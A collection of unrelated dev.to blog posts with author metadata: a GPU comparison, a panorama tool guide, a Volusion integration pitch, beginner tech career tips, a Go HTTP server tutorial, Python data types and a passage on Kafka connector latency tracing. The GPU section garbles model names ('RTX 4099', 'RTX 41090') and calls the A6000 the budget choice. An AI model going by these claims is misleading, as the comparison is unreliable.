sure they work well without getting too hot. _**the RTX A6000:**_ With its dual-slot setup, the RTX A6000 packs a big heatsink along with several heat pipes. This design helps get rid of heat effectively, ensuring that even when under a lot of pressure, the GPU's temperature stays manageable. Because it fits into two slots, it works with many types of workstations which makes adding it to your system pretty straightforward. _**the RTX 4090:**_ To have better airflow and cooling during intense gaming sessions, the RTX 4090 have a triple-slot configuration featuring an advanced cooling fan, which may boost heat removal and can lower the chances of overheating. You should also pay attention to this fact that this bigger size means you’ll need enough room in your computer case. **Physical dimensions and aesthetics** _**The RTX A6000:**_ The RTX A6000 sticks to a dual-slot design which means it can fit into lots of different workstations without any trouble. It's 267 mm long and takes up 2 slots, so putting it in most systems should be pretty straightforward. Plus, this card has a neat and professional look that matches Nvidia's Quadro series style. _**The RTX 4090:**_ With the RTX 4090, though, things are a bit bigger with its triple-slot design needing more room inside your PC case. It stretches out to 304 mm long and needs space for those extra slots - three in total. The look of this card is modern and cool, showing off Nvidia’s focus on gaming vibes. When choosing between the RTX A6000 and RTX 4099, consider their form factor and appearance to ensure they fit and suit your setup, respectively. The RTX A6000 leans towards professional applications under the Quadro name, while the RTX 4099 embraces gaming aesthetics. ## **Price and Value for Money** The price difference between the two GPUs reflects their target markets and intended uses. While the RTX A6000 caters to professionals needing high computational power, the RTX 4090 provides a balance between gaming and deep learning tasks. Ultimately, the value depends on how you prioritize performance, features, and budget constraints. Choose wisely based on your needs and usage scenarios. **Current market prices** Nowadays, there’s a certain price tag on both the RTX A6000 and the RTX 4090, bur they are different in different countries and areas. It’s interesting to note that Nvidia has made two kinds of series here: The Quadro series includes models like the RTX A6000 meant for professional use—think big work projects needing lots of computing power. Meanwhile, their GeForce line-up including models like the RTX 41090 is all about giving gamers an awesome experience with top-notch performance. The RTX A6000 was launched in October 2020, making it a newer and potentially more advanced option on the market. **Cost per frame analysis** The idea behind cost per frame is pretty straightforward - it tells you how much cash goes into every single frame a game shows. This helps figure out if spending on a graphics card gives good bang for your buck and if it's really worth shelling out for. With its top-notch gaming chops, the RTX 4090 cranks out high frames per second in tough games. Even though its cost per frame is more than that of the RTX A6000, the boost in performance makes up for this extra expense. On another note, the RTX A6000 shines when put to work on professional tasks and heavy-duty applications. Its cost per frame might not look as appealing compared to GPUs made mainly for gaming but stands as a solid investment for pros needing elite-level performance. ## **Another choice for you** Why don’t you make decision after you really experience each of these two GPUs? Novita AI GPU Pods offers you this possibility! Novita AI GPU Pods offers a robust platform for developers to harness the capabilities of high-performance GPUs. By choosing Novita AI GPU Pods, developers can efficiently scale their resources and focus on their core development activities without the hassle of managing physical hardware. Join Novita AI Community to discuss! ## **Conclusion** When choosing between the RTX A6000 and the RTX 4090, you are supposed to consider your specific needs and preferences. Both GPUs offer impressive features and performance tailored to different user requirements. Whether you prioritize gaming, professional projects, or budget constraints, evaluating their power efficiency, design, pricing, and user feedback is crucial. Additionally, consider your usage patterns, such as display quality and required connections, to facilitate the decision-making process. Ultimately, the goal is to strike a balance between top-notch performance, cost-effectiveness, and compatibility with your intended use. ## **Frequently Asked Questions** **Which GPU is better for long-term use?** For gaming or demanding work, the RTX 4090 is ideal. If saving money is a priority and top performance isn’t crucial, go for the RTX A6000. **Can either GPU be used for 4K video editing?** The RTX A6000 and RTX 4090 excel at this task, with the RTX 4090 superior than RTX A6000 due to its faster performance and rendering speed with more CUDA cores and quicker clock speeds. **what’s the Radeon equivalent of RTX 4090?** The RTX 4090 has no equal in performance or price. The closest competitor is the 7900XTX which is more of a 4080 competitor. **What is the real benefits of RTX A6000?** The real benefit for the A6000, beside the certified drivers and such, is being able to keep more stuff in the VRAM and thus get a smoother experience. > > Originally published at [Novita AI](https://novita.ai/blogs/rtx-a6000-vs-rtx-4090-which-gpu-is-right-for-you/). > [Novita AI](https://novita.ai), the one-stop platform for limitless creativity that gives you access to 100+ APIs. From image generation and language processing to audio enhancement and video manipulation, cheap pay-as-you-go, it frees you from GPU maintenance hassles while building your own products. Try it for free.
novita_ai
1,920,871
Generate cube image panorama
Introduction In today's digital age, high-quality panorama images are becoming...
0
2024-07-17T04:41:19
https://dev.to/nmthangdn2000/cut-cube-image-panorama-3gmn
threejs, panorama, view360
# Introduction In today's digital age, high-quality panorama images are becoming increasingly popular in fields like tourism, real estate, and interior design. However, the manual process of cropping cube panorama images can be time-consuming and prone to errors, which may affect the image quality when uploaded to the web. To address this challenge, an automatic cube panorama cropping tool is an optimal solution. This tool not only saves time but also ensures image optimization, leading to faster load times and a better user experience. In this blog post, we will explore how to use this tool to quickly and efficiently crop cube panorama images. # How to Install and Set Up the Tool In this section, I will provide a step-by-step guide on how to install and set up the automatic cubemap image cutting tool. This may include downloading the software, installing dependencies, and configuring the tool for optimal performance. Be sure to include screenshots or snippets of code to help illustrate the process. I also want to introduce that I am working on displaying tile panorama images using the photo-sphere-viewer.js library (https://photo-sphere-viewer.js.org/guide/adapters/cubemap-tiles.html#panorama-options). ### Requirements - Before you begin, make sure you have installed [ImageMagick](https://imagemagick.org/index.php), a powerful tool for image processing. - [Node](https://nodejs.org/) ### Clone the Repository To get started, clone the repository to your machine by running the following command: ```bash $ git clone https://github.com/nmthangdn2000/panorama-app.git ``` ### Installation After cloning, you need to install the necessary dependencies. Just run the following command:: ```bash $ cd panorama-app $ yarn ``` This will quickly set up your working environment. ### Build the Project Build your project with: ```bash $ yarn build ``` ### Run the Project Start your project with: ```bash $ yarn start ``` # How to Use the Tool In this section, I will guide you through the process of using the automatic cubemap image cutting tool. This includes uploading your panorama images, configuring the settings for optimal results, and viewing the final output. ### The first step is to select the storage location for the entire project. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/v77nuznau041o72z91ym.png) ### Create project ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/cz24fxhg36pd7y2drh7o.png) ### Add image panorama ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ryco5kzgztr10ukfq0q7.png) The tool has the following features: - Preview: Preview the panorama, select marker points, choose the initial view, and also has a function to create a mini map (this feature is not yet fully refined). - Render: Choose the size of each tile image, then start cropping the panorama image and reformat the entire data structure. - Export: Export all project data and compress it into a zip file. #Conclusion By following the steps outlined in this guide, you can efficiently use the automatic cubemap image cutting tool to process and display high-quality panorama images. The tool's features, including preview, render, and export functionalities, streamline the workflow, saving you time and ensuring optimal image quality for your projects. Whether you are working in tourism, real estate, interior design, or any other field that benefits from panoramic images, this tool will enhance your productivity and improve the user experience. Explore the possibilities and elevate your projects with this powerful and easy-to-use cubemap image cutting tool. You can find the complete project on [GitHub](https://github.com/nmthangdn2000/panorama-app.git). Thank you for reading! If you found this tool helpful, please give the repository a star. 🌟
nmthangdn2000
1,920,901
pip Trends Newsletter | 13-Jul-2024
This week's pip Trends newsletter is out. Interesting stuff by Stuart Ellis, Gonçalo Valério, Martin...
0
2024-07-13T03:30:00
https://dev.to/tankala/pip-trends-newsletter-13-jul-2024-3gch
programming, python, opensource, news
This week's pip Trends newsletter is out. Interesting stuff by Stuart Ellis, Gonçalo Valério, Martin Heinz, Himani Bansal & Ebo Jackson are covered this week {% embed https://newsletter.piptrends.com/p/modern-good-practices-for-python %}
tankala
1,920,933
Make Your Business Grow with Volusion Integration
In the ever-evolving world of eСommerce, integrating software and apps with various shopping...
0
2024-07-16T06:04:28
https://dev.to/api2cartofficial/make-your-business-grow-with-volusion-integration-5han
volusion, integration, ecommerce, saas
In the ever-evolving world of eСommerce, integrating software and apps with various shopping platforms is critical to success. With Volusion integration development, your path to eСommerce success will be more precise and achievable than ever. This article explores the benefits and processes of Volusion Integration, providing valuable insights for software developers and business owners. Let's explore how you can utilize Volusion's integration to unlock new opportunities, increase efficiency, and take your business to the next level. ## What is Volusion Integration? [Volusion](https://www.volusion.com/about) is a popular eCommerce platform that allows businesses to create and manage online stores. Integrating your SaaS app with Volusion can significantly expand your reach and allow you to offer your services to online store owners. This shopping platform powers more than 40,000 online stores. Volusion integration allows you to streamline your software operations, access Volusion stores and gain valuable insights into customer behavior. Having such an integration, your software will be able to get, update and delete Volusion data related to orders, prices, categories, etc. Volusion's robust API allows custom integrations tailored to your business needs, ensuring you can leverage its full potential. Volusion integration development for eCommerce software developers refers to the process of creating seamless connections between the Volusion eCommerce platform and their software systems or applications. This integration enables developers to automate workflows, synchronize data across platforms, and enhance functionality, thereby improving the efficiency of online stores on the Volusion platform. ##Volusion Integration for Your SaaS App Volusion integration for your [SaaS](https://www.ibm.com/topics/saas) app offers several benefits to streamline business operations and drive growth. Here are some key advantages of integrating Volusion with your SaaS app: - **Centralized management:** You can manage Volusion e-store product inventory, orders, and customer data directly from your SaaS app. You can easily add, update, or remove products, monitor inventory levels, and track order status, all from one unified dashboard. - **Seamless order fulfillment:** When a customer places an order on your SaaS app, the integration automatically sends the order details to your clients’ Volusion store. From there, you can quickly process and fulfill the order, keeping your customers informed about the status of their shipment. Automating these processes not only reduces errors but also significantly increases efficiency, enhancing customer satisfaction and making you feel more productive. - **Enhanced customer experience:** Your customers can browse their products, make purchases, and track their orders all within your app. It eliminates the need for customers to navigate to a separate website or platform, improving convenience and reducing friction in the buying process. ## Main difficulties While Volusion integration offers numerous benefits for your SaaS app, you may encounter some challenges during the integration process. Awareness of these potential difficulties is essential to ensure a smooth integration experience. - **Technical Complexity:** Depending on the complexity of your app and the specific integration requirements, you may need to invest time and resources to understand Volusion's API documentation and develop the necessary code to establish the connection. - **Data Mapping and Transformation:** To ensure seamless data flow between Volusion and your app, you may need to perform data mapping and transformation. This involves aligning the data structures and formats between the two systems. It's important to map the fields carefully and ensure data consistency to avoid data loss or inaccuracies. - **Testing and Troubleshooting:** You may encounter issues during the testing phase that require troubleshooting and debugging. It's essential to allocate sufficient time for testing and have a transparent process to identify and resolve any integration-related issues. - **Upgrades and Compatibility:** As your SaaS app and Volusion continue to evolve and release updates, new versions or updates of Volusion may introduce changes to APIs or data structures that may affect the functionality of your integration. So, it's essential to regularly review and update your integration to ensure it remains compatible with the latest version of Volusion. - **Security and Privacy:** You must ensure that sensitive customer information is transferred and stored. Familiarize yourself with Volusion's security measures and protocols to ensure that your integration meets industry best practices and complies with relevant data protection regulations. ## Volusion Integration Development via Third-Party Services Volusion Integration via third-party services enables you to take automation to the next level. **API2Cart is an online service** that provides a single API to **access 40+ shopping carts**. Volusion, with all its versions, is among [supported platforms](https://api2cart.com/supported-platforms/?utm_source=devto&utm_medium=referral&utm_campaign=volutionintegrationa.nem). This integration opens up possibilities for streamlining your business processes, saving time, and improving efficiency. API2Cart provides a powerful and flexible solution that simplifies the integration of eCommerce software solutions with the Volusion platform. By using a unified API, software developers can connect their applications to Volusion without the need to delve into the complexities of direct API management. This approach not only saves significant development time but also reduces maintenance costs, as it centralizes the connection to handle data interactions like product management, customer data retrieval, and order synchronization efficiently. This unified connection method ensures that eCommerce solutions can seamlessly access and manipulate data within the Volusion environment, enhancing the capabilities of eCommerce platforms. As a result, businesses can offer more robust services to their users, such as improved inventory updates, accurate order processing, and enhanced customer analytics. These improvements lead to better customer experiences and operational efficiencies, fostering growth and sustainability in the competitive online retail space. ## Conclusion Incorporating Volusion Integration into your SaaS app can significantly enhance its functionality and appeal, providing users seamless access to powerful eCommerce features. Volusion Integration offers many benefits that can drive your success for your SaaS app and deliver unparalleled user value.
api2cartofficial
1,921,030
Baby Steps in Tech
Transitioning into tech can be overwhelming, from choosing a programming language to getting the...
0
2024-07-12T20:29:11
https://dev.to/udeze/baby-steps-in-tech-4fo6
programming, beginners, tutorial, productivity
Transitioning into tech can be overwhelming, from choosing a programming language to getting the right resources, meeting the right mentors, and being in the right communities. Tech is an ever-evolving and robust field with plenty of room for you and me to make a career out of it. > _“The only way to discover the limits of the possible is to go beyond them into the impossible._” -Arthur C. Clarke > --- This well-curated roadmap will assist you in getting started on your tech journey. ### 1. Recognize your interest The advancement of technology offers a vast variety of fields, ranging from healthcare to finance, entertainment, agriculture, cyber security, web development, and many more. Dive into these areas to discover what aligns with your passion, interests, and existing skillset. > **Pro-Tip**💡: _Write down all of your strengths; the more, the better. Next, cross out any abilities that do not align with your long-term objectives and passion. Whatever is left should be your area of concentration. Look up the related tech niche using resources like YouTube and [Chapt-gpt](https://chatgpt.com/)._ ### 2. Acquire the necessary skills It is time to arm yourself with the required skills after you have decided on a professional path to pursue. Although some people prefer in-person instruction, online tutorials and courses are a great place to start. The most important thing is that you have access to learning resources. Many online courses and tutorials provide an easy-to-follow introduction to programming languages, technical concepts, and learning roadmaps. **Here are a few popular websites to get you started:** - **YouTube**: Many scholars have praised YouTube as a digital and mobile-friendly school that provides free courses in a variety of subjects and fields to its users. This is the ideal platform to use if you are looking for something inexpensive. - **Solo-Learn**: Solo Learn provides free programming courses for learning how to write code from beginner to advanced levels, including fun bit-sized exercises, lessons, and a user-friendly coding environment. - **Udemy**: Udemy is a platform that provides learning materials and courses after they have been paid for; the cost of each course ranges from a thousand to a couple thousand dollars (_check the rate in your local currency_). A certificate is issued upon the successful completion of each course. The intriguing part is that Udemy offers coupon codes to provide users with free courses. - **Google Cloud Skill Boost**: [Google Cloud Skill](https://www.cloudskillsboost.google/) Boost is a learning pathway that allows users to select a career path, develop skills, and earn badges for their achievements. Personally, I recommend using this to get more than 700 bite-sized courses and certification. These are only a few of the many others. ### 3. Join tech communities: Finding the right communities can be difficult at first, which is why I am here to help. Social media groups, forums, meetups, and hackathons are all examples of online tech communities. Reaching out to Google search, Slack, and course representatives from different departments at your university will help you locate the closest tech communities, meetups, and social media groups based on your location or place of education. > **Pro-Tip**💡: _Communities are the best place to learn quickly, ask questions and get feedback, network with like-minded individuals, and volunteer._ ### 4. Gain hands-on experience: While theoretical knowledge is valuable, practical application of what you have learned is essential. Building projects that use your skill set to solve real-world problems is essential to your tech career. Look for ways to put your newfound skills to use, such as working on personal projects or volunteering with open source initiatives. This improves both your comprehension of the material and your ability to collaborate with others. > **Pro-Tip💡**: _Volunteering with open source initiatives allows you to gain valuable experience that can be added to your resume, curriculum vitae (cv), or LinkedIn. Websites like [Git-hub](https://github.com/) and [open-source guides](https://opensource.guide/) are great places to start._ ### 5. Create a portfolio: A portfolio is a collection of work samples that demonstrate your technical proficiency and experience. It is critical to demonstrate your skills and abilities to potential employers and persuade them that you are a good fit for the job. Take part in hackathons and boot camps, work on personal projects to demonstrate your grasp of the skills you are learning, and make contributions to open-source initiatives. ### 6. Networking and connection: The tech industry thrives on collaboration and building connections. Connect with enthusiasts and professionals on platform like [LinkedIn](https://www.linkedin.com/in/emmanuel-udeze-b53bb7263/), [X](https://x.com/defno_name)(_formerly Twitter_), attend industry events and meetups around you to gain insight into tech landscape and build relationships. The connections made can provide valuable guidance, mentorship, and even job opportunities. ### 7. Applying for jobs with a tech-savvy resume: Prepare your resume to highlight the tech skills and experiences you may have acquired. Emphasize abilities such as collaboration, problem-solving, and communication. To make a good impression on prospective employers, practice answering tech interview questions to hone your interviewing skills. **Technology is an ever-changing industry. Stay current on trends, innovations, and technologies by reading publications, attending workshops and meetups, and taking online courses. Always ask questions and seek guidance from mentors and colleagues.** --- The End 🏁 Remember to follow, post a comment, give a heart, and tell your friends about it. I appreciate you reading, and I hope to see you in the next post.
udeze
1,921,154
Making a HTTP server in Go
I've stumbled upon Codecrafters a while ago, and the idea really caught my attention. Making real...
0
2024-07-15T12:44:57
https://dev.to/enzoenrico/making-a-http-server-in-go-1gpo
go, codenewbie, codecrafters, backend
I've stumbled upon [Codecrafters](https://codecrafters.io/) a while ago, and the idea really caught my attention. Making real world projects to learn, instead of following tutorials is everything I could've asked for when I was getting started, so just so I don't let the opportunity get away, I'm following their free project on writing a [HTTP server](https://app.codecrafters.io/courses/http-server/). I'm choosing Go for this project, I've been meaning to learn it fully for a good while now ## Starting the project Codecrafters has one of the coolest features I've seen for validating tests, once you commit your code to their repo, tests are automatically ran and your progress is validated. So, for this first step, all we have to do is un-comment some of the provided code to create our TCP server ```go import ( "fmt" "net" "os" ) func main() { fmt.Println("Logs from your program will appear here!") l, err := net.Listen("tcp", "0.0.0.0:4221") if err != nil { fmt.Println("Failed to bind to port 4221") os.Exit(1) } _, err = l.Accept() if err != nil { fmt.Println("Error accepting connection: ", err.Error()) os.Exit(1) } } ``` And everything goes smoothly! ![Terminal Screenshot](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ay13elreilrmok17qzux.png) For this second step, we're returning a response from our server. Codecrafters has this really cool "Task" card that explains everything you need to know to implement the next step ![Codecrafters screenshot](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/jcwrnracsok7dzb39a0c.png) So, we add a variable for our connected client and send him a Status 200 ```go //added conn for handling responses con, err := l.Accept() if err != nil { fmt.Println("Error accepting connection: ", err.Error()) os.Exit(1) } //variables for returning response var success string = "HTTP/1.1 200 OK\r\n" var ending string = "\r\n" //write into the connection con.Write([]byte(success + ending)) ``` ##Extracting URL Paths Now, we need to give a proper response based on the path that is being accessed on our server. We can identify the path using the received request ``` HTTP/1.1 200 OK ``` And since we're expanding the project scope, I've decided to create a utility package for handling operations like parsing and returning responses ``` /utils/handler.go ``` ``` go package utils import "net" type Handler struct { Conn net.Conn } func (h *Handler) Success() { //variables for returning response var success string = "HTTP/1.1 200 OK\r\n" var ending string = "\r\n" //write into the connection h.Conn.Write([]byte(success + ending)) } func (h *Handler) NotFound() { //variables for returning response var notFound string = "HTTP/1.1 404 Not Found\r\n" var ending string = "\r\n" //write into the connection h.Conn.Write([]byte(notFound + ending)) } func (h *Handler) Parse(req []byte) { h.Conn.Read(req) } ``` And in the main file , we add our connection to our handler and check the path of the request to return our responses ``` server.go ``` ```go //initialize the handler handler := utils.Handler{Conn: con} req := make([]byte, 1024) //parses the request to a readable format handler.Parse(req) fmt.Println("Request: ", string(req)) //path checking if !strings.HasPrefix(string(req), "GET / HTTP/1.1") { handler.NotFound() return } handler.Success() return ``` ##Returning a response Once again, I feel like I need to refactor my code, not only for adding some essentials I've forgotten but also to practice my Clean Code 😆 In the main file, we add a function to handle incoming connections ``` server.go ``` ```go func main() { fmt.Println("Starting server on port 4221") l, err := net.Listen("tcp", "0.0.0.0:4221") if err != nil { fmt.Println("Failed to bind to port 4221") os.Exit(1) } //if handled thread is closed / finished, close the listener defer l.Close() //keep listening to requests for { con, err := l.Accept() if err != nil { fmt.Println("Error accepting connection: ", err.Error()) os.Exit(1) } go handleConnection(con) } } func handleConnection(con net.Conn) { //if returned, close connection defer con.Close() //initialize the handler handler := utils.Handler{Conn: con} req := make([]byte, 1024) //parse the request urlPath := handler.GetURLPath(req) fmt.Println("URL Path: ", urlPath) if urlPath == "/" { handler.Success() return } handler.NotFound() return } ``` And in the handler we've written in the previous step, we add a function to get the URL path of a incoming request ``` /utils/handler.go ``` ```go func (h *Handler) GetURLPath(req []byte) string { parsed := h.Parse(req) firstheader := strings.Split(parsed[0], " ") return firstheader[1] } ``` For this step, we need to implement the /echo/:message endpoint, for returning whatever message is sent through the URL to the response body, for now, we can add a simple if statement checking the path ``` /app/server.go ``` ``` go //parse the request urlPath := handler.GetURLPath(req) fmt.Println("URL Path: ", urlPath) if urlPath == "/" { handler.Success() return }else if strings.Split(urlPath, "/")[1] == "echo" { msg := strings.Split(urlPath, "/")[2] handler.SendBody(msg) return } handler.NotFound() return ``` ##Reading the User-Agent header In this step we need to get the data from the 'User-Agent' header and return it in the body of our response First of all, we add a route to our server, and while we're at it, we can refactor the 'router' to something a little more readable ``` server.go ``` ```go switch strings.Split(urlPath, "/")[1] { case "echo": msg := strings.Split(urlPath, "/")[2] handler.SendBody(msg, len(msg)) return case "user-agent": // not the prettiest code ever, but hey, it works d := handler.UserAgent(req) d_msg := strings.Split(d, ": ")[1] d_len := len(d_msg) fmt.Println(d_msg) fmt.Println(d_len) handler.SendBody(d_msg, d_len) return default: handler.NotFound() } ``` And we add a new function in our handler to get the needed header value ``` /utils/handler.go ``` ```go // UserAgent returns the User-Agent header from the request. func (h *Handler) UserAgent(req []byte) string { // dont need to read the connection again parsed := strings.Split(string(req), "\r\n") for i := range parsed { if strings.Contains(parsed[i], "User-Agent") { return parsed[i] } } return "" } } ``` We also update our _SendBody_ function to get the correct content-length based on a parameter ```go func (h *Handler) SendBody(message string) { //variables for returning response var success string = "HTTP/1.1 200 OK\r\n" var contentType string = "Content-Type: text/plain\r\n" var contentLength string = fmt.Sprintf("Content-Length: %d\r\n", len(message)) var ending string = "\r\n" returnBody := success + contentType + contentLength + ending + message //write into the connection h.Conn.Write([]byte(returnBody)) } } ``` ## Handling concurency The next step would be handling multiple connections at the same time, our code already does that! In our main function, we call the _handleConnection_ function using the **go** keyword, creating a **goroutine** for each connection ``` server.go ``` ```go //if handled thread is closed / finished, close the listener defer l.Close() //keep listening to requests for { con, err := l.Accept() if err != nil { fmt.Println("Error accepting connection: ", err.Error()) os.Exit(1) } go handleConnection(con) } } ``` ## Sending Files In this activity, we implement the _/files/:file_ endpoint, this route returns a file in the body of the response to the user (if the file is found) For achieving this, we write a function in our _/utils/handler.go_ for sending the file ``` /utils/handler.go ``` ```go func (h *Handler) SendFile(data []byte) { //variables for returning response var success string = "HTTP/1.1 200 OK\r\n" // make sure to get the correct content-type var contentType string = "Content-Type: application/octet-stream\r\n" var contentLength string = fmt.Sprintf("Content-Length: %v\r\n", len(data)) var ending string = "\r\n" returnBody := success + contentType + contentLength + ending + string(data) //write into the connection h.Conn.Write([]byte(returnBody)) } ``` And in our main server file, we add a route to our switch statement ``` server.go ``` ```go case "files": filename := strings.Split(urlPath, "/")[2] //get the folder to the file filepath := os.Args[2] fmt.Printf("DIR: %s\n", filepath) //create folder if it dosent exist if _, err := os.ReadDir(filepath); err != nil { fmt.Println("Creating directory...") os.Mkdir(filepath, 0755) } fmt.Println("Reading: ", filepath+filename) data, err := os.ReadFile(filepath + filename) if err != nil { fmt.Println("Error on reading file") handler.NotFound() return } fmt.Println("Sending file...") handler.SendFile(data) ``` ## Reading the request body Our last challenge is reading the body of a post request Using our _/files/:fileName_ endpoint, we should read a POST request, create a file with the file name provided in the URL. In this created file we add the data provided in the post request For this to be achieved, we add a function to our _/utils/handler.go_ file to get the contents of the request body, method and a modification to our _SendBody_ function ``` /utils/handler.go ``` ```go func (h *Handler) GetBody(req []byte) string { parsed := h.Parse(req) return parsed[len(parsed)-1] } func (h *Handler) GetMethod(req []byte) string { parsed := h.Parse(req) firstheader := strings.Split(parsed[0], " ") return firstheader[0] } func (h *Handler) SendBody(message string, msgLen int, stcode int) { //variables for returning response var success string = fmt.Sprintf("HTTP/1.1 %v %v\r\n", stcode, http.StatusText(stcode)) var contentType string = "Content-Type: text/plain\r\n" var contentLength string = fmt.Sprintf("Content-Length: %v\r\n", msgLen) var ending string = "\r\n" returnBody := success + contentType + contentLength + ending + message //write into the connection h.Conn.Write([]byte(returnBody)) } ``` And that's it!! We've made an HTTP server from (almost) scratch, using nothing but the std library in Golang ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9fjcofh268v9vdgh8iqo.png) I'll definitely make more of those Codecrafters challenges in the future, so stay tuned to see!
enzoenrico
1,921,156
Day 3: Data types and variables in python 🧡
You do not need to specify which data you assigning to variable. It is smart⛓ enough to recognize...
0
2024-07-17T05:08:09
https://dev.to/aryan015/day-3-data-types-and-variables-in-python-3e3j
100daysofcode, python, javascript, java
You do not need to specify which data you assigning to variable. It is smart⛓ enough to recognize which datatype you are holding. We will understand data type and variables hand to hand. ## python variables Variable in programming(in general) is nothing but a value that can be used multiple times in your code. syntax ```py # syntax # variable_name = data ``` Look at below bad example ```py # take the user input name # and append welcome as a prefix # bad apprach that might annoy user print("welcome "+input("enter your name")) print("bye "+input("enter your name")) # use might save variable space (memory space) but it will be bad user experience ``` Now example (good) ```py # good approach # you might need username in future reference for the code so name = input("enter your name") print("welcome "+ name) print("bye ") # good approach ``` ## Variable naming - use [camleCasing](https://dev.to/aryan015/types-of-casing-in-programming-2j0d) - a variable name cannot start with a number. `9ty` must be invalid. - Only special symbol allowed are underscore (_). all below variable are valid ```py user_name = "aryan" g8 = "aryan" ``` ## supported datatypes [important] I don't want to afraid you with hordes of data category. ```py # 1. string # nothing but values between " and ' name = "aryan" # 2. integer # a number age = 26 PI = 3.14 # float # 3. bool # a value which either true or false isQualify = True canVote = False # 4. list/array # python array can hold multiple values (a container for different data) fruits = ["apple","Banana🍌","mango"] # 5. Dictionary # a datatype that holds key value pair # As of Python 3.7, dictionaries are ordered (items have a defined order). # In Python 3.6 and earlier, dictionaries are unordered. dict = {"brand": "Ford", "model": "Mustang", "year": 1964} # 6. tuple # an immutable datatype that contains any number of value and datatype and are ordered. any_tuple = (1, "hello", 3.14, True, [10, 20]) ``` [complete index](https://dev.to/aryan015/100-days-of-python-index-5eh) [my-linkedin🧡](https://www.linkedin.com/in/aryan-khandelwal-779b5723a/)
aryan015
1,921,161
Measuring and minimizing latency in a Kafka Sink Connector
Kafka is often chosen as a solution for realtime data streaming because it is highly scalable,...
0
2024-07-17T07:51:44
https://ably.com/blog/optimizing-kafka-sink-connector-latency
latency, kafka, webdev, news
Kafka is often chosen as a solution for realtime data streaming because it is highly scalable, fault-tolerant, and can operate with low latency even under high load. This has made it popular for companies in the fan engagement space, and where transactional data is used (e.g. betting) as low latency ensures that actions and responses happen quickly, maintaining the fluidity and immediacy of the experience. One of the easiest ways for companies to deliver data from Kafka to client devices is by using a Connector. Kafka Connectors act as a bridge between event-driven and non-event-driven technologies, and enable the streaming of data between systems - with ‘Sink Connectors’ taking on the responsibility of streaming data from a particular topic in the Kafka Cluster to external sources using events. Connectors sit within Kafka Connect, which is a tool designed for the scalable and reliable streaming of data between Apache Kafka and other data systems. ![An image showing the relationship between Kafka Connect and Connectors.](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/nug7v2on8ipmlxrz5o2r.png) Unfortunately, traditional approaches to scaling Kafka Connectors and managing extensive loads often prioritize throughput over latency optimization. And the distributed nature of Kafka Connect, and Connector’s dependency on external services make it challenging to optimize end-to-end latency and balance it with throughput. This means that where Kafka has been selected on the basis of its low latency, benefits can be lost when Connectors are introduced. This is particularly problematic in fan engagement applications, and those using transactional data, because latency is critical to their success. ## Solving for low latency with the Ably Kafka Connector Having worked with businesses like NASCAR, Genius Sports, and Tennis Australia, the engineering teams at Ably understand the importance of low latency. So, to support companies looking to stream data between Kafka and other applications, Ably developed its own Kafka Connector. Recently, we conducted research to determine the optimal configuration for achieving minimal latency for a Kafka Connector, specifically under a moderate load scenario of between 1,000 and 2,500 messages per second. Let’s look at how we achieved this, and took on the challenge of measuring latency and finding bottlenecks. ## Measuring latency and finding bottlenecks Balancing latency and throughput is a complex task, as improving one often means sacrificing the other. The distributed nature of Kafka Connect and Connector’s dependency on external services make it challenging to understand the impact of your optimizations on end-to-end latency. To address these challenges, we adopted a comprehensive approach using distributed tracing. Distributed tracing provides a detailed view of a request's journey through various services and components. This end-to-end visibility helps identify where latency is introduced and which components are contributing the most to the overall processing time. We decided to use OpenTelemetry for distributed tracing. OpenTelemetry is an open-source observability framework that supports over 40 different observability and monitoring tools. It integrates smoothly with various languages and frameworks, both on the frontend and backend, making it an ideal choice for gaining visibility into the end-to-end flow of messages in our Kafka Connect environment. ## How did we trace messages inside the Kafka Connector? ### 1. Instrumenting the load-testing tool We began by patching our load-testing tool to include OpenTelemetry context in Kafka message headers. This modification allowed us to embed tracing information directly into each message, ensuring that the trace context was carried along with the message throughout its lifecycle. Distributed tracing relies on context to correlate signals between different services. This context contains information that allows the sending and receiving services to associate one signal with another. ### 2. Enhancing the Kafka Connector Next, we patched the Kafka connector to extract the OpenTelemetry context from the message headers. The connector was modified to send traces at key points: when a message was queued and when it was published. By instrumenting these stages, we could monitor and measure the time spent within the Kafka connector itself. ### 3. Measuring end-to-end latency Finally, we extended our client application, which listens to the final Ably messages, to include tracing. By doing so, we could capture the complete end-to-end latency from the moment a message was produced until it was consumed. This comprehensive tracing setup allowed us to pinpoint latency bottlenecks and understand the impact of various optimizations on the overall performance. ### 4. Visualization To visualize the telemetry data, we used Amazon CloudWatch, which integrates seamlessly with OpenTelemetry. This integration allowed us to collect, visualize, and analyze the traces and metrics with ease: ![Visualizing the telemetry data with Amazon CloudWatch and OpenTelemetry](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/zopwxqtvi04ka244tqzj.png) Although we couldn't find an existing OpenTelemetry library to inject and extract context directly into and from Kafka messages, it was easy to implement this functionality ourselves. We achieved this by implementing simple `TextMapGetter` and `TextMapSetter` interfaces in Java. This custom implementation allowed us to embed and retrieve the tracing context within the Kafka message headers, ensuring that the trace information was properly propagated through our system: ```javascript // Implement TextMapGetter to extract telemetry context from Kafka message // headers public static final TextMapGetter<SinkRecord> textMapGetter = new TextMapGetter<>() { @Override public String get(SinkRecord carrier, String key) { Header header = carrier.headers().lastWithName(key); if (header == null) { return null; } return String.valueOf(header.value()); } @Override public Iterable<String> keys(SinkRecord carrier) { return StreamSupport.stream(carrier.headers().spliterator(), false) .map(Header::key) .collect(Collectors.toList()); } }; // Implement TextMapSetter to inject telemetry context into Kafka message // headers public static final TextMapSetter<SinkRecord> textMapSetter = new TextMapSetter<>() { @Override public void set(SinkRecord record, String key, String value) { record.headers().remove(key).addString(key, value); } }; ``` ## Fine-tuning with built-in Kafka Connector configuration With distributed tracing up and running, we were then ready to explore various methods to improve latency in Kafka Connectors. ### Partitioning One of the initial approaches we considered for reducing latency in Kafka was to increase the number of partitions. A topic partition is a fundamental unit of parallelism in Kafka. By distributing the load more evenly across multiple partitions, we anticipated that we could significantly reduce message processing times, leading to lower overall latency. However, during our research, we found out that our clients are not always able to increase the number of partitions due to their application logic constraints. Given these limitations, we decided to shift our focus to other optimization options. ### Number of tasks After deciding against increasing the number of partitions, we next focused on optimizing the 